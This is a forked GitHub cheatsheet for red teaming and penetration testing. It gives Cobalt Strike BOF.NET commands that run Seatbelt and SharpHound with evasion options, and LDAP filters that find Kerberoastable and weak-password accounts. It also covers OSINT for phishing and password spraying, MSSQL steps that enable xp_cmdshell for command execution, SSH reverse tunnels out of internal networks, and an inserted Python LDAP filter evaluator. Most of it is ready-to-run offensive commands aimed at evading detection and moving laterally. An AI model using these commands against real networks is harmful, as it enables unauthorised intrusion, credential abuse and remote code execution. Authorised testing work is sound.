s0rcad1n / redteam-pentest-cheatsheet-checklist

This project forked from ibr0wse/redteam-pentest-cheatsheet-checklist

Red Teaming and Penetration Testing Checklist, Cheatsheet, Clickscript

Not a definitive list or cheatsheet, and not OPSEC-safe by any means; just things of note...

Several enumeration techniques are picked up by defenses (including SharpHound collectors), especially LDAP queries with asterisks like attribute=*. Iterative lookups are usually better, if you know what I mean.

Must-Have BOFs:

Execute-Assembly through BOF:

All assemblies should be run through BOF.NET.

In Beacon terminal:

  1. bofnet_init
  2. bofnet_load /Path/To/Assembly.exe
  3. bofnet_executeassembly ASSEMBLYNAME -arg1 VALUE -arg2 VALUE

External Recon Checklist (Essentials)

  1. OSINT (Passive)
    • Whois lookup on the company; what do they do or specialize in?
    • Find out what the company atmosphere is like (use company review sites like Glassdoor)
    • ASN Lookups
    • DNS Recon (amass, subfinder, crt.sh, certspotter, DNS zone transfers, etc.), including MX/SPF etc.
    • Shodan
    • Company email format (first.last, flast, etc -> find on hunter.io)
    • Code repository recon (github, gitlab, bitbucket, etc) using truffleHog, git-secrets, etc
    • Perform AWS bucket and/or Azure blob enumeration using tools such as MicroBurst and inSp3ctor.
    • Harvest employee names (use theHarvester and/or Linky with keyword searches) and curate list with company email format
      • (Used for phishing and/or password spraying)
  2. (Active)
    • Nmap IPs/Domains for list of systems online and any open ports
    • Take note of any management ports externally accessible
    • Identify any web apps (Eyewitness/Aquatone)
      • (Especially employee login portals to perform a password spray)
    • Inspect web apps for comments or files hosted in amazon, azure, etc.
    • Perform discovery of documents across live domains to extract MetaData from (PowerMeta, FOCA)

Initial Access Recon

LDAP Queries with ldapsearch

Get all active (not disabled) Users

(&(objectCategory=person)(objectClass=user)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))

Get all active (not disabled) Computers

(&(objectCategory=Computer)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))

Get all Groups

(&(objectClass=group))

Get all Domain Admins

(&(objectCategory=group)(name=Domain Admins))

(This returns the group object; its members are listed in the member attribute.)

Get accounts with SPN set

(&(samAccountType=805306368)(servicePrincipalName=*)(!(samAccountName=krbtgt))(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))

Get specific User

(&(objectCategory=person)(objectClass=user)(samaccountname=TARGETUSERNAME))

Get specific Computer

(&(objectCategory=Computer)(name=TARGETCOMPUTERNAME))

Get Domain Controllers

(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))

Get Password Policy

(&(objectClass=msDS-PasswordSettings))

Get Users with passnotreq set

(&(objectCategory=Person)(objectClass=User)(userAccountControl:1.2.840.113556.1.4.803:=32))

All users with Password Never Expires set

(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=65536))

Others:

https://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx
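Added example (not from the original cheatsheet): a small Python evaluator for the subset of RFC 4515 filter syntax the queries above use (AND/OR/NOT, equality, the =* presence test, and the bitwise-AND matching rule 1.2.840.113556.1.4.803), run against a constructed set of account records so you can see which userAccountControl bits each filter actually selects. The records, names and the `user`/`search` helpers are made up for the demo; on the defensive side the same code audits an exported user list for the flags these filters target (disabled, PASSWD_NOTREQD, DONT_EXPIRE_PASSWD, SERVER_TRUST_ACCOUNT) without querying the directory.

```python
import re
BIT_AND = "1.2.840.113556.1.4.803"  # LDAP_MATCHING_RULE_BIT_AND: every bit of value is set
DISABLED, PASSWD_NOTREQD, SERVER_TRUST, DONT_EXPIRE = 2, 32, 8192, 65536  # UAC flag bits

def user(name, uac, spn=None):
    rec = {"objectCategory": "person", "objectClass": "user", "sAMAccountName": name,
           "sAMAccountType": 805306368, "userAccountControl": uac}
    return {**rec, "servicePrincipalName": spn} if spn else rec

RECORDS = [  # constructed sample records, not real directory data
    user("alice", 512),                                   # normal enabled user
    user("svc_sql", 512 | DONT_EXPIRE, "MSSQLSvc/db01"),  # service account with SPN
    user("krbtgt", 512 | DISABLED, "kadmin/changepw"),   # always disabled, has SPN
    user("olduser", 512 | DISABLED | PASSWD_NOTREQD),    # stale, password not required
    {"objectCategory": "computer", "objectClass": "computer", "sAMAccountName": "DC01$",
     "userAccountControl": SERVER_TRUST | 524288},        # typical DC value 532480
]

def parse(s, i=0):
    """Parse one parenthesised RFC 4515 filter at s[i]; return (node, index after it)."""
    assert s[i] == "(", "filter must start with '('"
    i += 1
    if s[i] in "&|!":
        op, i, kids = s[i], i + 1, []
        while s[i] == "(":
            kid, i = parse(s, i)
            kids.append(kid)
        return (op, kids), i + 1                          # skip the closing ')'
    end = s.index(")", i)
    attr, rule, value = re.fullmatch(r"([\w-]+)(?::([\d.]+):)?=(.*)", s[i:end]).groups()
    return ("cmp", attr.lower(), rule, value), end + 1

def matches(node, rec):
    if node[0] in ("&", "|"):
        return (all if node[0] == "&" else any)(matches(k, rec) for k in node[1])
    if node[0] == "!":
        return not matches(node[1][0], rec)
    _, attr, rule, value = node
    actual = next((v for k, v in rec.items() if k.lower() == attr), None)
    if actual is None:
        return False                                      # absent attribute never matches
    if value == "*":
        return True                                       # presence test, e.g. servicePrincipalName=*
    if rule == BIT_AND:
        return int(actual) & int(value) == int(value)
    return str(actual).lower() == value.lower()

def search(filter_text, records=RECORDS):
    node, _ = parse(filter_text)
    return [r["sAMAccountName"] for r in records if matches(node, r)]
```

The parser only accepts the standard form with NOT wrapped in its own parentheses, e.g. (!(samAccountName=krbtgt)); Active Directory also tolerates the unwrapped shortcut, but ldapsearch does not.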

Localhost Enumeration Examples with Seatbelt.exe

bofnet_load /path/to/Seatbelt.exe

bofnet_executeassembly Seatbelt -group=user

bofnet_executeassembly Seatbelt -group=system

bofnet_executeassembly Seatbelt -group=all -full

Sharphound Collection Methods for BloodHound

bofnet_load /path/to/sharphound.exe

Run the following methods one at a time, mix up the order as desired:

bofnet_executeassembly Sharphound --CollectionMethod Group --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames

bofnet_executeassembly Sharphound --CollectionMethod Trusts --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames

bofnet_executeassembly Sharphound --CollectionMethod ACL --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames

bofnet_executeassembly Sharphound --CollectionMethod ObjectProps --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames

bofnet_executeassembly Sharphound --CollectionMethod Container --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames

bofnet_executeassembly Sharphound --CollectionMethod GPOLocalGroup --Domain TARGETDOMAIN --NoSaveCache --RandomizeFilenames

If stuck and you need to do Session and LocalAdmin collection, target specific systems of interest:

bofnet_executeassembly Sharphound --CollectionMethod Session,LocalAdmin --Domain TARGETDOMAIN --ComputerFile c:\path\to\target\systems.list --Jitter 20 --Throttle 2000 --NoSaveCache --RandomizeFilenames

Windows Share Enumeration

Hunt for sensitive files, scripts, and plaintext credentials in accessible shares. Speed it up by using this amazing tool: Snaffler by l0ss.

Lateral Movement

MoveKit

MoveKit and the two required assemblies: SharpRDP + SharpMove.

Use the service binpath modification technique (SCShell by Mr-Un1k0d3r)

MSSQL

Check if xp_cmdshell is enabled

SELECT name, CONVERT(INT, ISNULL(value, value_in_use)) AS IsConfigured FROM sys.configurations WHERE name = 'xp_cmdshell';

Enable advanced options

EXEC('sp_configure ''show advanced options'', 1; reconfigure;');

Enable xp_cmdshell

EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;');

RCE

exec master.sys.xp_cmdshell 'whoami'

Nmap

High-value target (HVT) ports for some quick wins on discovered subnets (mostly when on an internal network)

  • Java RMI: 1090,1098,1099,4444,11099,47001,47002,10999
  • WebLogic: 7001-7004, 8000-8003,9000-9003,9503,7070,7071
  • JDWP: 45000,45001
  • JMX: 8686,9012,50500
  • GlassFish: 4848
  • jBoss: 11111,4444,4445
  • Cisco Smart Install: 4786
  • HP Data Protector: 5555,5556
  • Apache Solr: 8983,8984

Misc

Backup with Rsync

Backup CobaltStrike logs

rsync -avzh -e "ssh -i /path/to/private.key" root@TEAMSERVER:/path/to/cobaltstrike/logs/ /path/to/local/destination/folder

SSH Tunnels

Access internal box:

Create a tunnel at an externally accessible middlebox and back to Kali. Run from Kali (on someone's internal network, maybe):

ssh root@middlebox -R 2022:localhost:22

Run on middlebox:

ssh root@localhost -p 2022

Steps to produce a multihop one-liner to get into Kali:

Run on Kali:

ssh root@middlebox -R 2022:localhost:22

Run on your local system at home sitting behind firewall:

ssh -t root@middlebox -L 2023:localhost:2022 ssh -p 2022 root@localhost

BONUS: Access CobaltStrike or any other service running on Kali by running this on your local machine:

ssh -L 50050:localhost:50050 -p2023 root@localhost

Contributors

ibr0wse
